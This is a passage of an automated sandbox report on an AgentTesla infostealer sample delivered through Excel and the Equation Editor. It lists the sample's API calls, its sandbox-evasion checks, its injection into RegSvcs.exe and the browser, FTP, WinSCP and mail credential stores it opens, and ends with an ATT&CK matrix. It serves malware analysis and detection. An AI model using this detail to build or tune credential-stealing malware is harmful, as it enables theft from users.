                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_003C48D7
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00445376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00445376
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003E3187
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeAPI/Special instruction interceptor: Address: E948BC
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: fryvcftyii.exe, 00000005.00000003.473351327.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.473274593.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000002.478493824.0000000000E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                  Source: fryvcftyii.exe, 00000005.00000002.478445579.0000000000E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERG
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-102405
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeAPI coverage: 4.6 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3432Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0042445A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042C6D1 FindFirstFileW,FindClose,5_2_0042C6D1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0042C75C
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0042EF95
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0042F0F2
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0042F3F3
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_004237EF
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00423B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00423B12
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0042BCBC
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_003C49A0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-344
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeAPI call chain: ExitProcess graph end nodegraph_5-100896
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeAPI call chain: ExitProcess graph end nodegraph_5-100830
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00433F09 BlockInput,5_2_00433F09
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_003C3B3A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_003F5A7C
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C4B37 LoadLibraryA,GetProcAddress,5_2_003C4B37
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A05EF mov edx, dword ptr fs:[00000030h]2_2_036A05EF
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00E93508 mov eax, dword ptr fs:[00000030h]5_2_00E93508
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00E94B88 mov eax, dword ptr fs:[00000030h]5_2_00E94B88
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00E94B28 mov eax, dword ptr fs:[00000030h]5_2_00E94B28
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,5_2_004180A9
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003EA124 SetUnhandledExceptionFilter,5_2_003EA124
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_003EA155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004187B1 LogonUserW,5_2_004187B1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_003C3B3A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_003C48D7
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00424C53 mouse_event,5_2_00424C53
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00417CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00417CAF
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0041874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_0041874B
                  Source: fryvcftyii.exe, 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp, ngown[1].exe.2.dr, fryvcftyii.exe.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: fryvcftyii.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E862B cpuid 5_2_003E862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_003F4E87
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00401E06 GetUserNameW,5_2_00401E06
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_003F3F3A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_003C49A0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: fryvcftyii.exe, 00000005.00000003.473351327.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.473274593.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000002.478493824.0000000000E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
                  Source: fryvcftyii.exe, 00000005.00000003.473351327.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.473274593.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000002.478493824.0000000000E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fryvcftyii.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: fryvcftyii.exeBinary or memory string: WIN_81
                  Source: fryvcftyii.exeBinary or memory string: WIN_XP
                  Source: fryvcftyii.exeBinary or memory string: WIN_XPe
                  Source: fryvcftyii.exeBinary or memory string: WIN_VISTA
                  Source: fryvcftyii.exeBinary or memory string: WIN_7
                  Source: fryvcftyii.exeBinary or memory string: WIN_8
                  Source: fryvcftyii.exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.620861905.00000000021A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fryvcftyii.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fryvcftyii.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00436283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00436283
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00436747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00436747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		2
                  Valid Accounts                  		121
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution                  		2
                  Valid Accounts                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS138
                  System Information Discovery                  		Distributed Component Object Model121
                  Input Capture                  		12
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets45
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts                  		Cached Domain Credentials12
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Virtualization/Sandbox Evasion                  		DCSync2
